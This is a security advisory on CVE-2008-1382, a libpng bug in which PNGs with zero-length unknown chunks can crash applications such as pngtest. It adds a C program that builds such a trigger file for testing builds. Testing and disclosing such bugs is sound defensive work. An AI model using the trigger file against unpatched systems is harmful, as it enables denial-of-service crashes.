Credit:
The information has been provided by Andrea Barisani.
The original article can be found at: http://www.ocert.org/advisories/ocert-2008-003.html
Vulnerable Systems:
* libpng-1.0.6 through 1.0.32
* libpng-1.2.0 through 1.2.26
* libpng-1.4.0beta01 through libpng-1.4.0beta19
All of the above when built with PNG_READ_UNKNOWN_CHUNKS_SUPPORTED or PNG_READ_USER_CHUNKS_SUPPORTED (both are enabled in the default configuration)
Immune Systems:
* libpng version 1.2.27
* libpng version 1.0.33
* libpng version 1.2.27beta01
Technical Details:
The bug exists in all libpng versions since 1.0.6. It only manifests itself when all three of the following conditions exist:
1. The application is loaded with libpng-1.0.6 through 1.0.32, libpng-1.2.0 through 1.2.26, or libpng-1.4.0beta01 through libpng-1.4.0beta19, and
2. libpng was built with PNG_READ_UNKNOWN_CHUNKS_SUPPORTED or with PNG_READ_USER_CHUNKS_SUPPORTED (both are active in default libpng installations), and
3. the application includes either a call to
png_set_read_user_chunk_fn(png_ptr, user_ptr, callback_fn)
or a call to
png_set_keep_unknown_chunks(png_ptr, keep, list, N)
with keep = PNG_HANDLE_CHUNK_IF_SAFE (2)
or keep = PNG_HANDLE_CHUNK_ALWAYS (3)
This combination is believed to be rare. It occurs in "pngtest", which is part of the libpng distribution, in pngcrush, and in recent versions of ImageMagick (6.2.5 through 6.4.0-4). The library vendor is not currently aware of any other vulnerable applications.
When an affected application reads a PNG containing a zero-length unknown chunk, libpng emits spurious warnings about a CRC error in the zero-length chunk and an out-of-memory condition, unless warnings are suppressed. There is no actual memory overflow: the memory allocator returns a NULL pointer when asked for a zero-length buffer for the chunk data, and that NULL return is what triggers the warning. Later, the application may fail when it tries to free the buffer that was never allocated. This has been observed to cause a segmentation violation in pngtest.
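The following is an added example, not code from libpng, oCERT or the advisory. It does two things a practitioner wants when checking a build against this issue: it constructs, in memory, a minimal PNG whose only payload beyond IHDR/IEND is a zero-length private ancillary chunk (the chunk type "prVt", the 1x1 image geometry and the output file name zero_len_chunk.png are arbitrary choices made here), and it walks the chunks with a reader that treats a zero-length chunk as "nothing to allocate" rather than requesting a zero-byte buffer and later freeing whatever came back. The program does not link libpng; to exercise libpng itself, feed the written file to pngtest or pngcrush, which the text above identifies as applications that enable unknown-chunk handling.

```c
/* Added example (not libpng code): build a PNG carrying a zero-length
 * unknown chunk and parse it without allocating a zero-length buffer. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* CRC-32 as specified by the PNG standard (reflected polynomial 0xEDB88320). */
static uint32_t png_crc32(const uint8_t *buf, size_t len)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        c ^= buf[i];
        for (int k = 0; k < 8; k++)
            c = (c & 1u) ? (c >> 1) ^ 0xEDB88320u : c >> 1;
    }
    return c ^ 0xFFFFFFFFu;
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
static uint32_t get_be32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Append one chunk: length, type, data, CRC over type+data.
 * Returns the new write offset, or 0 if the buffer is too small. */
static size_t put_chunk(uint8_t *out, size_t cap, size_t off,
                        const char type[4], const uint8_t *data, uint32_t len)
{
    if (off + 12 + len > cap) return 0;
    put_be32(out + off, len);
    memcpy(out + off + 4, type, 4);
    if (len) memcpy(out + off + 8, data, len);
    put_be32(out + off + 8 + len, png_crc32(out + off + 4, 4 + len));
    return off + 12 + len;
}

static const uint8_t PNG_SIG[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};

/* Constructed sample: signature, IHDR for a 1x1 8-bit grayscale image, a
 * zero-length private ancillary safe-to-copy chunk "prVt", then IEND.
 * No IDAT on purpose: the unknown chunk is reached before any pixel decoding.
 * Returns the total byte count, or 0 if cap is too small. */
size_t build_zero_length_unknown_png(uint8_t *out, size_t cap)
{
    const uint8_t ihdr[13] = {0, 0, 0, 1, 0, 0, 0, 1, 8, 0, 0, 0, 0};
    if (cap < 8) return 0;
    memcpy(out, PNG_SIG, 8);
    size_t off = put_chunk(out, cap, 8, "IHDR", ihdr, 13);
    if (!off) return 0;
    off = put_chunk(out, cap, off, "prVt", NULL, 0);   /* the trigger chunk */
    if (!off) return 0;
    return put_chunk(out, cap, off, "IEND", NULL, 0);
}

struct chunk_stats { int chunks; int unknown_zero_len; int bad_crc; };

/* Walk every chunk and verify its CRC. This reader has no handler for any
 * ancillary chunk, so every ancillary chunk is "unknown" to it. A zero-length
 * unknown chunk is counted and skipped; no buffer is requested and nothing is
 * freed, which is the case that tripped the affected libpng versions.
 * Returns 0 on success, -1 on a bad signature or a truncated stream. */
int walk_chunks(const uint8_t *png, size_t size, struct chunk_stats *st)
{
    memset(st, 0, sizeof *st);
    if (size < 8 || memcmp(png, PNG_SIG, 8) != 0) return -1;
    size_t off = 8;
    while (off + 12 <= size) {
        uint32_t len = get_be32(png + off);
        if (len > size - off - 12) return -1;          /* data would overrun the buffer */
        const uint8_t *type = png + off + 4;
        if (png_crc32(type, 4 + len) != get_be32(png + off + 8 + len)) st->bad_crc++;
        int ancillary = (type[0] & 0x20) != 0;          /* lowercase first letter */
        if (ancillary && len == 0) {
            st->unknown_zero_len++;                     /* nothing to copy: no malloc, no free */
        } else if (ancillary) {
            uint8_t *copy = malloc(len);                /* len > 0 here, so a NULL means real OOM */
            if (!copy) return -1;
            memcpy(copy, png + off + 8, len);
            free(copy);
        }
        st->chunks++;
        off += 12 + len;
        if (memcmp(type, "IEND", 4) == 0) break;
    }
    return off == size ? 0 : -1;
}

int main(void)
{
    uint8_t png[128];
    struct chunk_stats st;
    size_t n = build_zero_length_unknown_png(png, sizeof png);
    if (!n || walk_chunks(png, n, &st) != 0) { fputs("build/walk failed\n", stderr); return 1; }
    printf("%zu bytes, %d chunks, %d zero-length unknown, %d bad CRC\n",
           n, st.chunks, st.unknown_zero_len, st.bad_crc);
    FILE *f = fopen("zero_len_chunk.png", "wb");       /* feed this file to pngtest or pngcrush */
    if (!f || fwrite(png, 1, n, f) != n) return 1;
    fclose(f);
    return 0;
}
```

The chunk walker also rejects a declared length that runs past the end of the input and counts CRC mismatches instead of aborting, so the same harness can be reused to confirm that a libpng build reports a clean CRC for this file rather than the spurious CRC warning the text describes.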
CVE Information:
CVE-2008-1382
Disclosure Timeline:
2008-04-05: Contacted libpng maintainers
2008-04-05: Vendor confirms
2008-04-05: Verification of vendor suggested patch
2008-04-12: libpng-1.2.27beta01 released
2008-04-12: libpng project advisory released
2008-04-12: Advisory release